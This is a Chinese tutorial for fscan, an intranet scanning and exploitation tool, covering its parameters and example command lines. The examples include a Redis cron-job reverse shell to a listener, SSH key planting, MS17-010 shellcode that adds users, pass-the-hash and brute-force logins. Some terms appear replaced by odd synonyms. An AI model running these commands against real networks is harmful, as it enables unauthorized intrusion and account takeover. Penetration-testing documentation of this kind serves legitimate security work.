一、先容:
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划使命反弹shell、读取win网卡信息、web指纹辨认、web弊端扫描、netbios探测、域控辨认等功能。
二、主要功能
1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、弊端扫描:
netbios探测、域控辨认
获取目的网卡信息
高危弊端扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹辨认(常见cms、oa框架等)
web弊端扫描(weblogic、st2等,支持xray的poc)
5.弊端使用:
redis写公钥或写计划使命
ssh命令执行
ms17017使用(植入shellcode),如添加用户等
6.其他功能:
文件生存
三、安装
下载地址
https://github.com/shadow1ng/fscan/releases

三、参数阐明
- Usage of fscan.exe:
- -br int
- Brute threads (default 1)
- -c string
- exec command (ssh|wmiexec)
- -cookie string
- set poc cookie,-cookie rememberMe=login
- -debug int
- every time to LogErr (default 60)
- -dns
- using dnslog poc
- -domain string
- smb domain
- -full
- poc full scan,as: shiro 100 key
- -h string
- IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12 | 192.168.1.0/24
- -hash string
- hash
- -hf string
- host file, -hf ip.txt
- -hn string
- the hosts no scan,as: -hn 192.168.1.1/24
- -json
- json output
- -m string
- Select scan type ,as: -m ssh (default "all")
- -no
- not to save output log
- -nobr
- not to Brute password
- -nocolor
- no color
- -nopoc
- not to scan web vul
- -noredis
- no redis sec test
- -np
- not to ping
- -num int
- poc rate (default 20)
- -o string
- Outputfile (default "result.txt")
- -p string
- Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
- -pa string
- add port base DefaultPorts,-pa 3389
- -path string
- fcgi、smb romote file path
- -ping
- using ping replace icmp
- -pn string
- the ports no scan,as: -pn 445
- -pocname string
- use the pocs these contain pocname, -pocname weblogic
- -pocpath string
- poc file path
- -portf string
- Port File
- -proxy string
- set poc proxy, -proxy http://127.0.0.1:8080
- -pwd string
- password
- -pwda string
- add a password base DefaultPasses,-pwda password
- -pwdf string
- password file
- -rf string
- redis file to write sshkey file (as: -rf id_rsa.pub)
- -rs string
- redis shell to write cron file (as: -rs 192.168.1.1:6666)
- -sc string
- ms17 shellcode,as -sc add
- -silent
- silent scan
- -socks5 string
- set socks5 proxy, will be used in tcp connection, timeout setting will not work
- -sshkey string
- sshkey file (id_rsa)
- -t int
- Thread nums (default 600)
- -time int
- Set timeout (default 3)
- -top int
- show live len top (default 10)
- -u string
- url
- -uf string
- urlfile
- -user string
- username
- -usera string
- add a user base DefaultUsers,-usera user
- -userf string
- username file
- -wmi
- start wmi
- -wt int
- Set web timeout (default 5)
复制代码 五、使用方法
简单用法
- fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
- fscan.exe -h 192.168.1.1/16 (B段扫描)
复制代码 其他用法
- fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
- fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
- fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
- fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
- fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
- fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
- fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
- fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
- fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
- fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
- fscan.exe -hf ip.txt (以文件导入)
- fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
- fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
- fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
- fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
- fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
- fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
- fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
复制代码 六、举例阐明:
1.端口扫描:Fscan可以扫描目的主机上的TCP端口,发现开放的服务和弊端。
可以使用以下命令扫描目的主机的TCP端口:
该命令将扫描域名、ip地址或者网段的全部TCP端口,并列出开放的端口和运行的服务。
2. 服务爆破
可以或许对服务进行爆破,可以使用内置的字典,也可以本身指定字典
查看可爆破的服务
- fscan.exe -h ip地址 -m -h 查看可爆破的服务,-m指定爆破类型
- ___ _
- / _ \ ___ ___ _ __ __ _ ___| | __
- / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
- / /_\\_____\__ \ (__| | | (_| | (__| <
- \____/ |___/\___|_| \__,_|\___|_|\_\
- fscan version: 1.8.4
- The specified scan type does not exist
- -m
- [ssh]
- [findnet]
- [netbios]
- [ms17010]
- [mssql]
- [all]
- [main]
- [icmp]
- [ftp]
- [rdp]
- [psql]
- [fcgi]
- [mem]
- [webpoc]
- [oracle]
- [smb]
- [redis]
- [cve20200796]
- [smb2]
- [mysql]
- [web]
- [webonly]
- [mgo]
- [wmiexec]
- [portscan]
复制代码 mysql爆破
如下,指定对某个主机的psql服务进行爆破
- fscan.exe -h ip -m psql #使用默认的字典
- fscan.exe -h ip -m psql -userf user.txt -pwdf passwd.txt #使用指定的字典
复制代码
默认对全部服务爆破
如下,指定对多个主机默认全部服务进行爆破
- fscan.exe -h ip1,ip2 -m all -userf user.txt -pwdf passwd.txt
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |